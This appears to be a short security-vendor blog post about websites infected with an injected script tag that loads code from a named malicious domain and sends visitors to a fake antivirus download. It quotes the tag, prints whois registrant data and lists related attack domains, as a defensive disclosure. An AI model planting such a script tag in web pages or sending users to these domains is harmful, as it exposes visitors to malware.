Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:
< script src = "http://sippa.dottasink.net/music/indi.php”></script>
This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.
And guess who registered that domain?
$ whois dottasink.net
..
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
usAdministrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us
Yes, the same group behind “vancouvererrorsonfile, whereisdudescars and various other attacks (losotrana.com, zettapetta.com, etc).
Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread through all sorts of shared servers, but it seems to be too early to tell how many sites are affected.
If your site is hacked, this script should clean it up: wordpress-fix.php or contact us for a professional, hands on clean-up (support@sucuri.net).